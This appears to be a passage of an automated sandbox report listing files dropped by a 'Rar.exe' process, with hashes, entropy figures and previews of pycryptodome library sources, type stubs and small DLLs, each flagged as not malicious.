                                                                                                                                                                                                                                  SHA-256:98831540F44AB7137A0DE53A8A8C818DEC32F0DC9C2731912424AECCE04C07FA
                                                                                                                                                                                                                                  SHA-512:354925C7E294A4FEA723AEBE1F618EF8DF1A82FDE95B578C86AB8DC21473E0719832E05D8971B537633631AAF62A2C6885A0D2F1F92A584C93F96F76D8204867
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2035
                                                                                                                                                                                                                                  Entropy (8bit):5.0956096784751965
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:MbWOqrYJALrYJHdG43tDs3EsIG13NcuIH2+Mq5+RscRV:MbDqrYJALrYJHdt3EHGuIWK5+RscRV
                                                                                                                                                                                                                                  MD5:D4DD7789231F56101EAA341F5FD21A95
                                                                                                                                                                                                                                  SHA1:81FFD38FA0896E265B36EF52A15EE3BA5FAD7A75
                                                                                                                                                                                                                                  SHA-256:38D65295DD3E4506C462350E7766FB7D16635CC7E6A234FE0E4B14C7AF6089C6
                                                                                                                                                                                                                                  SHA-512:268E5FEDF74F36A2309E83B6642ACE469D7871C29F1975D4080D5992E9A29F8DFA681EEE85E7E8106E6A15A95B0D2FC336A8EDB1B81BA55F49D3F9E940E8EA89
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2018, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                                                                                  Entropy (8bit):4.354688723015057
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:pAQybsRVLSyUkMFjRVLy:OdbsRnORQ
                                                                                                                                                                                                                                  MD5:2318A22B25D0854BD019BAEF901BB42A
                                                                                                                                                                                                                                  SHA1:37E3185DAACB1E611F02805F63044E28779DEFFF
                                                                                                                                                                                                                                  SHA-256:72FD9C4BBFF5954C58E3AE5C421334E7A570E5E8108DCB45499F8B497B359F5E
                                                                                                                                                                                                                                  SHA-512:B38E4BB47DF8EB1D8457D32BA047D2AB5278925854FEF51B8B922C9D0DC092DF19A1BCF9DF1F33CABD79583AC10D289F29A4E5A67B55B886D4282C5404767403
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:def have_aes_ni() -> int: .....def have_clmul() -> int: .....
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8704
                                                                                                                                                                                                                                  Entropy (8bit):5.008513190034663
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:6Ku39PERtoqPAF+GBWM8o5WJ1ks/vnpjOCD7DaD2eQ5MmGffQTQrXd:6Ku39PE5gjBWMNWJzhjOg5MVnUwN
                                                                                                                                                                                                                                  MD5:E198EFEBB927979BC481F8B109F64C19
                                                                                                                                                                                                                                  SHA1:9EF5F3DDFA2DBD72DD5F94D1CEB911CA1E446CC6
                                                                                                                                                                                                                                  SHA-256:0C75E88EFD4158D687A410F7318B6CE79036C4A419A538BA20E86BEBC750C72B
                                                                                                                                                                                                                                  SHA-512:5BD60A98F8C49BFBC1F30BBBA62BD2216FAD83DD13B4167B0EF24F7FEBFC2A03FF189C3D4754C49798970BCC21F1E9871DE61B85A7DD8498538BBB6590C81BFF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N...N...N...6R..N...1...N..6...N...N...N...1...N...1...N...1...N.......N.......N....>..N.......N..Rich.N..........PE..L...7..e...........!...%............N........ ...............................`............@..........................$..|...<%..P....@.......................P..@...`!............................... ..@............ ..h............................text............................... ..`.rdata..D.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..@....P....... ..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2225
                                                                                                                                                                                                                                  Entropy (8bit):5.261890106278258
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:MCWOqrYJALrYJHdG43tDs3EsIG13NcuIH3z+9gNQjdod9qRh3jy:MCDqrYJALrYJHdt3EHGuIXztObQ
                                                                                                                                                                                                                                  MD5:4505C49A1831D0C93256DA8E78C1564B
                                                                                                                                                                                                                                  SHA1:63721BBAEA6BE397ADC3C4C1AA4335DBECCE215C
                                                                                                                                                                                                                                  SHA-256:B8FF883AA293F99710EA591A58AA8D0D03FEEEDD5AA49C560B60A05FD3D413E1
                                                                                                                                                                                                                                  SHA-512:3C6F8710D907EE676C8770012E4DF3542A063D40185D52EF4C93AB98E8227F2C85C353C5B82B519D97D016FE62052084E8E4FB0B8609EBB59440F85E613A2602
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2016, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):103
                                                                                                                                                                                                                                  Entropy (8bit):4.5743153977203175
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:1REvgBAWxXfcAiTMXtKIOcSkWtWemUL/:1REYB9xXkVM96nRWe1/
                                                                                                                                                                                                                                  MD5:FFE308959102B5607429CEF941E9560E
                                                                                                                                                                                                                                  SHA1:3DA8DA002FEBDA41FE88459082E6CD8E57B9A5B3
                                                                                                                                                                                                                                  SHA-256:2F8B0576992C17D8191119B78CF52F73540F11F2502360F71266F5FF848FB5B5
                                                                                                                                                                                                                                  SHA-512:35EE20412D0AC941F7368DAB82E4A4996DF4058981BA6C07B24E99D533C2BE38E65B8911A7E99EE03A370DF63B557DD3F77839CA10BE939C98BE3E14BB650C65
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import List......def pycryptodome_filename(dir_comps: List[str], filename: str) -> str: ...
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10877
                                                                                                                                                                                                                                  Entropy (8bit):4.8802384608443194
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:9qrskrs9t3q/IPtqY6t+DqX5WZ0cKqRlpZK0Xn4n/noOKcNeJWAc:0rskrs9VqkYRt+DqX5WZrKq7pZpX4/oC
                                                                                                                                                                                                                                  MD5:B87B25D98E8337122AE998F9ABF4D2B1
                                                                                                                                                                                                                                  SHA1:9B3FC679A26A4300CAE579BACB9AF93677426927
                                                                                                                                                                                                                                  SHA-256:67E1B4E201861F9A86E2DB1E548909CDEE46892CDCE59B3575CD9C7FF755BD54
                                                                                                                                                                                                                                  SHA-512:B15ADEB7D2FC9A050E80499A2CA1D0FD7203E24523C1DF591012AF01E9118B98D384DE0429612D2FEB4D8B9563FBC31A501FE4EE7C53BA2B590DE0A3A0F077F5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):933
                                                                                                                                                                                                                                  Entropy (8bit):4.777842095513583
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1RExEeWw8O8GLziQDqwhBhhB+OTlAavvsZPWJuL:8EeTLPqkVv+PiE
                                                                                                                                                                                                                                  MD5:577B9FD6612492C13AAD9D5FDC396C43
                                                                                                                                                                                                                                  SHA1:2840A5AE5DA3ADA506BC9E64F4FB1324C021FCA7
                                                                                                                                                                                                                                  SHA-256:83C6B0310C82B4193830D59B3DABE23544ACF53FF2B53E0F918F2E8DB01F7485
                                                                                                                                                                                                                                  SHA-512:67E8794F498344EBEE1F95351169355EA139AE6937E867B7716E7A06ECEB3AE30F430630370BE7B06F325434041D9581DFA3831FFBF5F67FF7F88AE24C2935F0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Any, Optional, Union....def load_lib(name: str, cdecl: str) -> Any : .....def c_ulong(x: int ) -> Any : .....def c_ulonglong(x: int ) -> Any : .....def c_size_t(x: int) -> Any : .....def create_string_buffer(init_or_size: Union[bytes,int], size: Optional[int]) -> Any : .....def get_c_string(c_string: Any) -> bytes : .....def get_raw_buffer(buf: Any) -> bytes : .....def c_uint8_ptr(data: Union[bytes, memoryview, bytearray]) -> Any : .......class VoidPointer(object):.. def get(self) -> Any : ..... def address_of(self) -> Any : .......class SmartPointer(object):.. def __init__(self, raw_pointer: Any, destructor: Any) -> None : ..... def get(self) -> Any : ..... def release(self) -> Any : .......backend : str..null_pointer : Any..ffi: Any....def load_pycryptodome_raw_lib(name: str, cdecl: str) -> Any : .....def is_buffer(x: Any) -> bool : .....def is_writeable_buffer(x: Any) -> bool : .....
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8704
                                                                                                                                                                                                                                  Entropy (8bit):4.962980810410063
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:UKu39PERtoqPAF+GBWM8o5WJ1ks/vnpjOVJ5ApMmGffQTQrXd:UKu39PE5gjBWMNWJzhjOVoMVn0wN
                                                                                                                                                                                                                                  MD5:1B6AB07C1EA3F1A5F28DB01750AC150F
                                                                                                                                                                                                                                  SHA1:F477F97925C51BBB4E0DE498700E4589BEB88F51
                                                                                                                                                                                                                                  SHA-256:08558063C68B9A3C5006F5D78852ECB6CAF6A246CF268E23725DF2DDF7B7F67B
                                                                                                                                                                                                                                  SHA-512:695B5C48D922E66BFAF1518623E7CFA68F8BD0909F310FD2A494D9DB13DAD34D2C6A9BF23294A5C6990CA4EBAC2BD09D50D5B0E31BD162A7337CC04A9AA8A4C7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N...N...N...6R..N...1...N..6...N...N...N...1...N...1...N...1...N.......N.......N....>..N.......N..Rich.N..........PE..L...9..e...........!...%............N........ ...............................`............@..........................$..t...4%..P....@.......................P..@...`!............................... ..@............ ..h............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..@....P....... ..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):37233
                                                                                                                                                                                                                                  Entropy (8bit):4.49642341890235
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:pdRLPqWbhH6msz9l3UquMwES5LItw+8hlx:pdRVHU9lkquMwES5LD+8Tx
                                                                                                                                                                                                                                  MD5:9D11029C7D2E1C72C06B462CA3AA996B
                                                                                                                                                                                                                                  SHA1:E783B5F0CC01BC86D0C16D3B4F54300D57C214C8
                                                                                                                                                                                                                                  SHA-256:EEDE3556B282CDC640281A6AB6DF6C7EE20F9BE59C37B01AC09EA32F0F35887E
                                                                                                                                                                                                                                  SHA-512:33D713F6CA8260831AD984D88F279441819308D7C9A3F7A92770D0731BDD74F90EFA46124FAAEACFE74EEACB84D1F6217CA6D01DED3270DF53A5C7D2311B535F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: ascii -*-..#..# Util/asn1.py : Minimal support for ASN.1 DER binary encoding...#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3885
                                                                                                                                                                                                                                  Entropy (8bit):4.815634844501543
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:Acab6f+hGLbu31eXTTVkwB60oofRTOB+Jk2:AcjuJYTTVkS6IF6+m2
                                                                                                                                                                                                                                  MD5:1EFE3020CA61E0B1DA7B8680D73F84DA
                                                                                                                                                                                                                                  SHA1:D996C31812286881EB3D6E3FA28715095EC5587F
                                                                                                                                                                                                                                  SHA-256:4DB889724654605FF759C5B7D754174D13F71B3B621792E48AD0F9BE0CFCCC57
                                                                                                                                                                                                                                  SHA-512:12D48E230826E09437536FB35642F434E71D5C219A6B61FAF064B785CD09E131F7595AC7DBE1A359C81B23DC24B3436F6AFDF9CE7EBD6961EBEDAF23F5F81F28
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Optional, Sequence, Union, Set, Iterable....__all__ = ['DerObject', 'DerInteger', 'DerOctetString', 'DerNull',.. 'DerSequence', 'DerObjectId', 'DerBitString', 'DerSetOf']....# TODO: Make the encoded DerObjects their own type, so that DerSequence and..# DerSetOf can check their contents better....class BytesIO_EOF:.. def __init__(self, initial_bytes: bytes) -> None: ..... def set_bookmark(self) -> None: ..... def data_since_bookmark(self) -> bytes: ..... def remaining_data(self) -> int: ..... def read(self, length: int) -> bytes: ..... def read_byte(self) -> bytes: .......class DerObject:.. payload: bytes.. def __init__(self, asn1Id: Optional[int]=None, payload: Optional[bytes]=..., implicit: Optional[int]=None,.. constructed: Optional[bool]=False, explicit: Optional[int]=None) -> None: ..... def encode(self) -> bytes: ..... def decode(self, der_encoded: bytes, strict: bool=...) -> DerObject: .......class DerInte
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):97896
                                                                                                                                                                                                                                  Entropy (8bit):4.090850897275891
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:EnYL5QeQEUkknbkEEpeoc06BsJ7rajyCJrOiVDtT5U1464iPpAji6R449qVnSPt4:0YTXrtNajhJrOs5uPqe6CJn6KEVama39
                                                                                                                                                                                                                                  MD5:3602B83C3AC94CFAAFA24C3A8C41895B
                                                                                                                                                                                                                                  SHA1:5F4C1EB93B011F12A117C509CE7A878420D19307
                                                                                                                                                                                                                                  SHA-256:6CE48B150797316B1DC24B6AD759F0A3F2D3D6DA339E5BCCEDEC9342800450E5
                                                                                                                                                                                                                                  SHA-512:BC2F5B9DEB7D7678A67092CCCB1BEEA42E2B6BD9E028F9764C675340E247A8967D7704F054A1E4035C9698C8F7DD4FB3548502E157892E2DE36ADF917C3BD311
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# number.py : Number-theoretic functions..#..# Part of the Python Cryptography Toolkit..#..# Written by Andrew M. Kuchling, Barry A. Warsaw, and others..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):994
                                                                                                                                                                                                                                  Entropy (8bit):4.898132103946567
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1RE0x1JCvE59p+vE59eE59iLdUKhGnE597pcSpShFE59cSpShFE5vUyrfunVshdU:bxX7Z+crYnJescsje
                                                                                                                                                                                                                                  MD5:81227B5A65D7EF13CB0247C9B7225673
                                                                                                                                                                                                                                  SHA1:8954A181B5E8D7B31145E5C139935B9780E4D1EB
                                                                                                                                                                                                                                  SHA-256:6BD67E3A908997245FB373BC1C4971BAC0CFDD5FC17D4B7CDBD3F51AD6774AF1
                                                                                                                                                                                                                                  SHA-512:12F42616F440853BF94758392116879BE87073F515AE0C33454BFAC2D80140DE0FCC0469E34D8E06B42436A3EDEF4B5BE8D0E7C5EFCE413CE0F89041556CCA59
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import List, Optional, Callable......def ceil_div(n: int, d: int) -> int: .....def size (N: int) -> int: .....def getRandomInteger(N: int, randfunc: Optional[Callable]=None) -> int: .....def getRandomRange(a: int, b: int, randfunc: Optional[Callable]=None) -> int: .....def getRandomNBitInteger(N: int, randfunc: Optional[Callable]=None) -> int: .....def GCD(x: int,y: int) -> int: .....def inverse(u: int, v: int) -> int: .....def getPrime(N: int, randfunc: Optional[Callable]=None) -> int: .....def getStrongPrime(N: int, e: Optional[int]=0, false_positive_prob: Optional[float]=1e-6, randfunc: Optional[Callable]=None) -> int: .....def isPrime(N: int, false_positive_prob: Optional[float]=1e-6, randfunc: Optional[Callable]=None) -> bool: .....def long_to_bytes(n: int, blocksize: Optional[int]=0) -> bytes: .....def bytes_to_long(s: bytes) -> int: .....def long2str(n: int, blocksize: Optional[int]=0) -> bytes: .....def str2long(s: bytes) -> int: .......sieve_base: List[int]..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6010
                                                                                                                                                                                                                                  Entropy (8bit):4.8279694547928065
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:WKYFQHvoA6pDLeAIeCGtFaVBS3eKQM4ks58B1S9+Ow34eHPwAEx2pdDSSUSAJn7e:W9QHvilIUwpK5lBssOk4eldSE4n7R0ua
                                                                                                                                                                                                                                  MD5:11D063AE5BC40D2D943DF399F95DDA04
                                                                                                                                                                                                                                  SHA1:6D8C8391EEBDAE9FE2724F791B5D87A16E4D77CE
                                                                                                                                                                                                                                  SHA-256:2CF7955872D7D8A23F12B9340AC867E8E342102FED7B80DBA25B6303D7992155
                                                                                                                                                                                                                                  SHA-512:B2E2C98C03916DE5BB15F36B9A1972769825E1E514AFEA153AC292F3FFF716E589FCF009BD42459D5B7A35C456A3645F2D3D0E59DAFEF198563CDBF83F2B2245
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# Util/py3compat.py : Compatibility code for handling Py3k / Python 2.x..#..# Written in 2010 by Thorsten Behrens..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWA
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):870
                                                                                                                                                                                                                                  Entropy (8bit):4.791491758318878
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:1REgT3JtgPnrnIW9h3MnBbRFNU+U4Fu31954iEe1oHhASLjPMQ:pZtgMcUTkDTtoBjLt
                                                                                                                                                                                                                                  MD5:E7EC097AA59EF78A17CCA1860BE69741
                                                                                                                                                                                                                                  SHA1:A25E52635BA19E8324128B8900378458BDAA3AF2
                                                                                                                                                                                                                                  SHA-256:A1913976F178C28B8A7C117093233AAC0D3E772C4876DA9C084382BB95F2AC2D
                                                                                                                                                                                                                                  SHA-512:675F6249EF76BDA58D64ABF2BEB84DA58C04A4054F380BC3C2D63CA0D0CAB3342FB36A43925C6176D494F70AC1AEFD06DDB809F28F4A3412E857ACA1F42E6451
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:from typing import Union, Any, Optional, IO....Buffer = Union[bytes, bytearray, memoryview]....import sys....def b(s: str) -> bytes: .....def bchr(s: int) -> bytes: .....def bord(s: bytes) -> int: .....def tobytes(s: Union[bytes, str]) -> bytes: .....def tostr(b: bytes) -> str: .....def bytestring(x: Any) -> bool: .......def is_native_int(s: Any) -> bool: .....def is_string(x: Any) -> bool: .....def is_bytes(x: Any) -> bool: .......def BytesIO(b: bytes) -> IO[bytes]: .....def StringIO(s: str) -> IO[str]: .......if sys.version_info[0] == 2:.. from sys import maxint.. iter_range = xrange....else:.. from sys import maxsize as maxint.. iter_range = range....class FileNotFoundError:.. def __init__(self, err: int, msg: str, filename: str) -> None:.. pass....def _copy_bytes(start: Optional[int], end: Optional[int], seq: Buffer) -> bytes: .....
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5587
                                                                                                                                                                                                                                  Entropy (8bit):4.7939511946106
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:MwDqrYJALrYJHdt3EHGuIWYIzbJRSTdOqvdJLb9YmPhv+h:9qrskrs9t3q/Ik8gqlRdhy
                                                                                                                                                                                                                                  MD5:C08EBC91E1A45FED150F8E5608E2AF15
                                                                                                                                                                                                                                  SHA1:80AAA3BF9159A68321B464D3DA455D3EB3713F36
                                                                                                                                                                                                                                  SHA-256:3E36AE472CE5CFBA3B02DBF0CC2A132F868C6DA8002F5B8E895C873DDB79A029
                                                                                                                                                                                                                                  SHA-512:ACD238B1FC40197C4EA5DAFABD79A2BDBE4BE684F4BC0AB4361EAAD16DA92220A80D26E805D2FDDE01295FF959A91F4A830EE02F4FCB91F3BB0DEDBA295C01CD
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):249
                                                                                                                                                                                                                                  Entropy (8bit):4.800678842548869
                                                                                                                                                                                                                                  Encrypted:false
